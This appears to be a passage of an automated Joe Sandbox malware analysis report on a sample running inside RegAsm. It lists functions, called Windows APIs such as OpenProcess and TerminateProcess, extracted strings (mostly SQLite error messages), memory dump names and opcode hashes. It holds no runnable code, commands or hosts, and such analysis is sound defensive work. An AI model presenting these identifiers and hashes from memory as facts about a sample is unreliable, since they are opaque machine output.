memcmp.MSVCRT ref: 00406F1C
memset.MSVCRT ref: 00406F4B
LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Strings

v10, xrefs: 00406F14

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
String ID: v10
API String ID: 2733184300-1337588462
Opcode ID: 85a4b6c4d79d9ecb69051f0be4380a8051f9990f91c957560a55da9ff1847b22
Instruction ID: f86363b79356d93d16ddde529e0af623defbfa8f5e4b2f625dbd4641cab3a7e4
Opcode Fuzzy Hash: 85a4b6c4d79d9ecb69051f0be4380a8051f9990f91c957560a55da9ff1847b22
Instruction Fuzzy Hash: 84317CB1E00219ABCB10DF95DC95EEFBB78EF40358F10413BF822A6181D778AA55CA59

Function 1B4AEBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4AEC42
%s at line %d of [%.10s], xrefs: 1B4AEC51
CREATE , xrefs: 1B4AEBFF
database corruption, xrefs: 1B4AEC4C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: 47de98078162508596aaa576224155acec1e2b62020e4101495bdba83fdc0a94
Instruction ID: d8bdf9f513dd333bce6ce1b4a3912a8aa4cc5bf1b765e1c131d482f8c0c45cc4
Opcode Fuzzy Hash: 47de98078162508596aaa576224155acec1e2b62020e4101495bdba83fdc0a94
Instruction Fuzzy Hash: 99315C669443C15DEB314B799C40BF2BBE1AB6521AF2880BBF8D64E243E3269580C731

Function 1B407050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

invalid, xrefs: 1B40706F
API call with %s database connection pointer, xrefs: 1B407074
bad parameter or other API misuse, xrefs: 1B407083
out of memory, xrefs: 1B407059, 1B4070A2

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
API String ID: 0-453588374
Opcode ID: 3531b13b6a975b5a128c88245bf1d1d23a2fea5418478d838e9c3544194b0fe6
Instruction ID: 8c51612a90747e724447e04b16b0d9d3ccb1cffa85186087e18c03ded3484bc7
Opcode Fuzzy Hash: 3531b13b6a975b5a128c88245bf1d1d23a2fea5418478d838e9c3544194b0fe6
Instruction Fuzzy Hash: CA3139B1E0434057EB14CB24DC06BEB33965B80615F69C13AE4C59A386EE29E88783A3

Function 1B4893A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B489446, 1B48948A
%s at line %d of [%.10s], xrefs: 1B489455, 1B489499
database corruption, xrefs: 1B489450, 1B489494

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1da867de259593bede8713ba81e23c29ce3601b832bea2309b979151523c2f86
Instruction ID: 200e0fffadd1752608156be3ec608287b94e91e468409cfaf5e178a0d666d66b
Opcode Fuzzy Hash: 1da867de259593bede8713ba81e23c29ce3601b832bea2309b979151523c2f86
Instruction Fuzzy Hash: F3313A39A04B905BD714EF68C890AF3BBF29F89705B94845CE5C64B746E332E851C760

Function 1B414F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B414F62, 1B414FF3
%s at line %d of [%.10s], xrefs: 1B414F71, 1B415002
database corruption, xrefs: 1B414F6C, 1B414FFD

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: e5795cbbf8a4a27e37a955b107b8e67d98ec9a3884a4874d8410a84ca3e8df94
Instruction ID: bf446c32b1f9fc294d80337915825477e127fe643e7c0274ecdcb9aad4b1477e
Opcode Fuzzy Hash: e5795cbbf8a4a27e37a955b107b8e67d98ec9a3884a4874d8410a84ca3e8df94
Instruction Fuzzy Hash: 3E3105766005416BD700EF29DD81BE6FBE0BF45316F08826AF4598B782D325E96097A0

Function 1B3E1C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3E1D3C
%s at line %d of [%.10s], xrefs: 1B3E1D4B
misuse, xrefs: 1B3E1D46
unknown database: %s, xrefs: 1B3E1CBD

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: a998079562a776a4e81a684f7a8ac8ffceb713f55ad0dc6f945a81a1ea55b358
Instruction ID: 0450fc9920a558ec3269b7eb3bd357a199e5765959f5df6fcefd2549efb457ab
Opcode Fuzzy Hash: a998079562a776a4e81a684f7a8ac8ffceb713f55ad0dc6f945a81a1ea55b358
Instruction Fuzzy Hash: 652138B5900B506BE7109F279C44FEB77AD9FD1319F04062EF89596281D731E9258372

Function 1B413FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B41407D, 1B4140A8
%s at line %d of [%.10s], xrefs: 1B41408C, 1B4140B7
database corruption, xrefs: 1B414087, 1B4140B2

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c3fc43a3ab4eb7bd59a7467121c173f12e1295710a425ad732fdf7d720a54044
Instruction ID: a2e97cc968996ecb839873af88270aca2e91594bef010e35922b4d4bbd9cd5a7
Opcode Fuzzy Hash: c3fc43a3ab4eb7bd59a7467121c173f12e1295710a425ad732fdf7d720a54044
Instruction Fuzzy Hash: 2E21F877A002115BDB00EF19EC416EBBBD4EB84652F86802AFD84D7341E325EA5987E2

Function 1B489290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B48929C, 1B48932A
%s at line %d of [%.10s], xrefs: 1B4892AB, 1B489339
database corruption, xrefs: 1B4892A6, 1B489334

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7061133fb6daac1029a826001bcbf2c638b492358be504bd6c7f12d26a7fa478
Instruction ID: b1014b4cda605a742c0c9b9f3176dc0a452d3c76bbed66686ec94b112bde5004
Opcode Fuzzy Hash: 7061133fb6daac1029a826001bcbf2c638b492358be504bd6c7f12d26a7fa478
Instruction Fuzzy Hash: C0219B29504F905AD721EF689C91AE3FFF19F48301B88849CE1D387786E232F881C750

Function 0040E9F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040EA10

Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8D5
Part of subcall function 0041F8C0: __CxxThrowException@8.LIBCMT ref: 0041F8EA
Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8FB

std::_Xinvalid_argument.LIBCPMT ref: 0040EA32
memcpy.MSVCRT ref: 0040EA6F

Strings

string too long, xrefs: 0040EA2D
invalid string position, xrefs: 0040EA0B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position$string too long
API String ID: 214693668-4289949731
Opcode ID: a8df07e9b3e94a63226f214a24b0347b1362abfadacd90833dd3e13aab622cc0
Instruction ID: 12f8c32a840f705f93bb0079e636769b92456c6ac02408d01627c3a7287d2833
Opcode Fuzzy Hash: a8df07e9b3e94a63226f214a24b0347b1362abfadacd90833dd3e13aab622cc0
Instruction Fuzzy Hash: 61118E313002109FDB24DE6DD981A5AB3E8FB4A704B100D7FF952EB282D774ED558BA9

Function 1B3F33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1B3F33D6

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: 0a198d380ec5d3c9f56bc75301554ede47cfa89e5882b5720037c3315dd8b1eb
Instruction ID: 83a15d04706b5a36cfee597b546e7ea16f963c167ffe0775fe9e93da1602b7cc
Opcode Fuzzy Hash: 0a198d380ec5d3c9f56bc75301554ede47cfa89e5882b5720037c3315dd8b1eb
Instruction Fuzzy Hash: 7601B93AB443165BD701DF1DE8417CAB3D5EFC5311F45817AF5048B240EB70A95787A1

Function 1B585BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6B799CC3,?,?,00000000,1B5DD1CB,000000FF,?,1B585B30,?,?,1B585ADF,?), ref: 1B585BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1B585C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,1B5DD1CB,000000FF,?,1B585B30,?,?,1B585ADF,?), ref: 1B585C2A

Strings

CorExitProcess, xrefs: 1B585C00
mscoree.dll, xrefs: 1B585BEF

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ac046dd6ba1499e74d8db3c1de775292ecafc9eefcbb8fce98410ba654c89e75
Instruction ID: d02d320a8eac7468ebd17722708d15ff7f2764de9f8fa3117f0afffcdd108c96
Opcode Fuzzy Hash: ac046dd6ba1499e74d8db3c1de775292ecafc9eefcbb8fce98410ba654c89e75
Instruction Fuzzy Hash: B4016271914669AFEB058F94CD44BEEB7FCFB44756F410A2AE822E2280DB79D904CB50

Function 1B4F6A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9986e5d88157e32b2226060dbca44c5249fe1809d400dd4cc679ddf08890eaa9
Instruction ID: eb96f4dd52301ce57e06db5770833862bcc8d412a1b26c0f5608df261c496343
Opcode Fuzzy Hash: 9986e5d88157e32b2226060dbca44c5249fe1809d400dd4cc679ddf08890eaa9
Instruction Fuzzy Hash: 39029DB0904356DFD704DF69C884B9AB7E8BF94305F40862EF88587341EB74E958CBA2

Function 00411CFF Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411D04
memset.MSVCRT ref: 00411D26

Part of subcall function 00411955: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411D53,00000000,?,00000000,?), ref: 00411960
Part of subcall function 00411955: HeapAlloc.KERNEL32(00000000,?,00411D53,00000000,?,00000000,?), ref: 00411967
Part of subcall function 00411955: wsprintfW.USER32 ref: 00411978

OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411DAD
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411DBB
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411DC2

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 1628159694-0
Opcode ID: 06c41640e6ab16d0c2f7907fab5fdab6bfd13005ed4d937ae6178ca25d34c030
Instruction ID: ba362e458b58e7180219ef42c87bc7a87a854006b9d45818738230f1b6861096
Opcode Fuzzy Hash: 06c41640e6ab16d0c2f7907fab5fdab6bfd13005ed4d937ae6178ca25d34c030
Instruction Fuzzy Hash: FE318071901129ABDF11DB91DC859EFBB7DFF0A754F100016F606E6190D7345A85CBA4

Function 00411B62 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00412B6E,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411B6E
lstrcpyn.KERNEL32(00640760,?,00000000,00000104,?,00412B6E,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411B87
lstrlenA.KERNEL32(00000104,?,00412B6E,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411B99
wsprintfA.USER32 ref: 00411BAB

Strings

%s%s, xrefs: 00411BA5

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

